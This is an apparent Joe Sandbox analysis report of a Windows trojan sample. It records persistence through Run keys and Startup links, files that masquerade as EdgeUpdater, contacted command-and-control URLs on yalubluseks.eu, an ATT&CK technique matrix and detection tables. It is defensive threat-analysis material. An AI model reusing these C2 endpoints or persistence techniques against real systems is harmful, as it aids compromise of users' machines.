Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe VolumeInformation

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	121 Registry Run Keys / Startup Folder	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Query Registry	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	121 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	111 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	41 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Obfuscated Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	12 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Yc9hcFC1ux.exe	65%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
Yc9hcFC1ux.exe	68%	Virustotal		Browse
Yc9hcFC1ux.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	65%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	65%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
api.ipify.org	0%	Virustotal		Browse
yalubluseks.eu	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://yalubluseks.eu/t	0%	Virustotal		Browse
https://yalubluseks.eu	3%	Virustotal		Browse
https://yalubluseks.eu/get_update.php	1%	Virustotal		Browse
http://api.ipify.org/	0%	Virustotal		Browse
https://yalubluseks.eu/receive.php	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	172.67.74.152	true	false	0%, Virustotal, Browse	unknown
yalubluseks.eu	104.21.54.163	true	false	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api.ipify.org/	false	0%, Virustotal, Browse	unknown
https://yalubluseks.eu/get_update.php	true	1%, Virustotal, Browse	unknown
https://yalubluseks.eu/receive.php	true	0%, Virustotal, Browse	unknown
https://yalubluseks.eu/get_file.php	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://yalubluseks.eu/t	UUSIService.exe, 00000002.00000002.3379367451.0000000002F81000.00000004.00000800.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
http://yalubluseks.eud	UUSIService.exe, 00000002.00000002.3379367451.000000000357C000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://api.ipify.orgD	UUSIService.exe, 00000002.00000002.3379367451.0000000003509000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://api.ipify.orgd	UUSIService.exe, 00000002.00000002.3379367451.0000000003509000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://yalubluseks.euD	UUSIService.exe, 00000002.00000002.3379367451.000000000357C000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://yalubluseks.eu/get_filT	UUSIService.exe, 00000002.00000002.3379367451.000000000357C000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://yalubluseks.eu	UUSIService.exe, 00000002.00000002.3379367451.0000000002F81000.00000004.00000800.00020000.00000000.sdmp	true	3%, Virustotal, Browse	unknown
http://api.ipify.orgh	UUSIService.exe, 00000002.00000002.3379367451.000000000357C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	UUSIService.exe, 00000002.00000002.3379367451.0000000002F81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://yalubluseks.eu	UUSIService.exe, 00000002.00000002.3379367451.000000000357C000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://api.ipify.org	UUSIService.exe, 00000002.00000002.3379367451.000000000357C000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000002.00000002.3379367451.0000000002F81000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.54.163	yalubluseks.eu	United States		13335	CLOUDFLARENETUS	false
172.67.74.152	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1531528
Start date and time:	2024-10-11 10:16:52 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Yc9hcFC1ux.exe renamed because original name is a hash value
Original Sample Name:	0e926b28fc49f6259a70c032ae83cd14.exe
Detection:	MAL
Classification:	mal84.winEXE@21/158@2/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 329 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22, 52.182.143.212, 20.189.173.20, 52.168.117.173, 13.89.179.12, 20.42.73.29
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com
Execution Graph export aborted for target EdgeUpdaters.exe, PID 5092 because it is empty
Execution Graph export aborted for target UUSIService.exe, PID 1052 because it is empty
Execution Graph export aborted for target UUSIService.exe, PID 1948 because it is empty
Execution Graph export aborted for target UUSIService.exe, PID 4152 because it is empty
Execution Graph export aborted for target UUSIService.exe, PID 4208 because it is empty
Execution Graph export aborted for target UUSIService.exe, PID 4560 because it is empty
Execution Graph export aborted for target UUSIService.exe, PID 6416 because it is empty
Execution Graph export aborted for target UUSIService.exe, PID 6476 because it is empty
Execution Graph export aborted for target UUSIService.exe, PID 7104 because it is empty
Execution Graph export aborted for target UUSIService.exe, PID 7132 because it is empty
Execution Graph export aborted for target Yc9hcFC1ux.exe, PID 2244 because it is empty
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:17:42	API Interceptor	1x Sleep call for process: Yc9hcFC1ux.exe modified
04:17:43	API Interceptor	1894706x Sleep call for process: UUSIService.exe modified
04:17:58	API Interceptor	8x Sleep call for process: WerFault.exe modified
04:18:16	API Interceptor	2058035x Sleep call for process: EdgeUpdaters.exe modified
10:17:46	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UUSIService_64d204b5c5e14fd8b0be2636671abc33 C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
10:17:55	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UUSIService_3824e21cda984d7894707e45b8faf82c C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
10:18:03	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_2f79f0adcf954e24a21fdda9ce0da31e.lnk
10:18:16	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UUSIService_955fea78b7ac40eb9e0fc1887c107a2c C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
10:18:24	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UUSIService_9e8b69fc719b4685bc7cffc277dfe9af C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
10:18:32	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_f827da91bc664cdc9ece459a3d1c468a.lnk
10:18:45	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UUSIService_dbd5e1c384bd40a98a7962069001d3aa C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
10:18:53	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UUSIService_5d165eda359744a99df25c8ac2974c25 C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
10:19:01	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_e4a26e83483f46279dce2ec0377d0587.lnk
10:19:15	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UUSIService_c5d858544ea14a74bac226d74223cc00 C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
10:19:23	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UUSIService_32fc4a29748343cebf9c0589546cf556 C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
10:19:31	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_322055c8dd1d432b9ada39f6723b4851.lnk
10:19:44	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UUSIService_59bfca1f0b394f9c854b5b1a311f908d C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
10:19:52	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UUSIService_a1cb16b968c74176adf5b6f63619042b C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.54.163	firmware.armv7l.elf	Get hash	malicious	Unknown	Browse	104.21.54.163/
172.67.74.152	4F08j2Rmd9.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	y8tCHz7CwC.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	2zYP8qOYmJ.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
yalubluseks.eu	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	172.67.140.92
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	172.67.140.92
	file.exe	Get hash	malicious	Unknown	Browse	104.21.54.163
	file.exe	Get hash	malicious	Unknown	Browse	104.21.54.163
	file.exe	Get hash	malicious	Unknown	Browse	172.67.140.92
	file.exe	Get hash	malicious	Unknown	Browse	104.21.54.163
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	172.67.140.92
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	104.21.54.163
	2zYP8qOYmJ.exe	Get hash	malicious	Unknown	Browse	172.67.140.92
	2zYP8qOYmJ.exe	Get hash	malicious	Unknown	Browse	172.67.140.92
api.ipify.org	Order0958490.vbe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	SecuriteInfo.com.Win64.PWSX-gen.30688.21076.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	https://www.canva.com/design/DAGTGtfEYnw/CziuYyD8EEWyTr61OD4BbQ/edit?utm_content=DAGTGtfEYnw&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutto	Get hash	malicious	HtmlDropper	Browse	172.67.74.152
	HS034Ewroq.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	RUN.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	installer.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	Oldsetup.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	https://linkpage.bio/verifybusinessaccount1368	Get hash	malicious	Unknown	Browse	172.67.74.152
	YyhAkj09dy.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	kwVoiAAfGm.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	172863360835d20919b44677196a226b8640c862c471dbf7782ce73f7db5505942e7eb6033428.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Get hash	malicious	FormBook	Browse	172.67.220.57
	awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.js	Get hash	malicious	Remcos	Browse	172.67.19.24
	RFQ.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	DIEN OMM 10.10.2024.vbe	Get hash	malicious	Unknown	Browse	188.114.97.3
	Quote101024.doc	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
	Payment Notification.lnk	Get hash	malicious	XWorm	Browse	104.21.86.112
	P065.00760_0858_PDF.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Agenda de Pagamento outubro 2024.vbe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
CLOUDFLARENETUS	kwVoiAAfGm.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	172863360835d20919b44677196a226b8640c862c471dbf7782ce73f7db5505942e7eb6033428.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Get hash	malicious	FormBook	Browse	172.67.220.57
	awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.js	Get hash	malicious	Remcos	Browse	172.67.19.24
	RFQ.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	DIEN OMM 10.10.2024.vbe	Get hash	malicious	Unknown	Browse	188.114.97.3
	Quote101024.doc	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
	Payment Notification.lnk	Get hash	malicious	XWorm	Browse	104.21.86.112
	P065.00760_0858_PDF.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Agenda de Pagamento outubro 2024.vbe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	172863360835d20919b44677196a226b8640c862c471dbf7782ce73f7db5505942e7eb6033428.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.54.163
	awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.js	Get hash	malicious	Remcos	Browse	104.21.54.163
	DIEN OMM 10.10.2024.vbe	Get hash	malicious	Unknown	Browse	104.21.54.163
	Payment Notification.lnk	Get hash	malicious	XWorm	Browse	104.21.54.163
	P065.00760_0858_PDF.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.54.163
	Agenda de Pagamento outubro 2024.vbe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.54.163
	Order0958490.vbe	Get hash	malicious	AgentTesla	Browse	104.21.54.163
	rShipmentDocuments.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.54.163
	http://kale.amwebsolution.com/yuop/66c323e1543cd_ffrs.exe	Get hash	malicious	Unknown	Browse	104.21.54.163
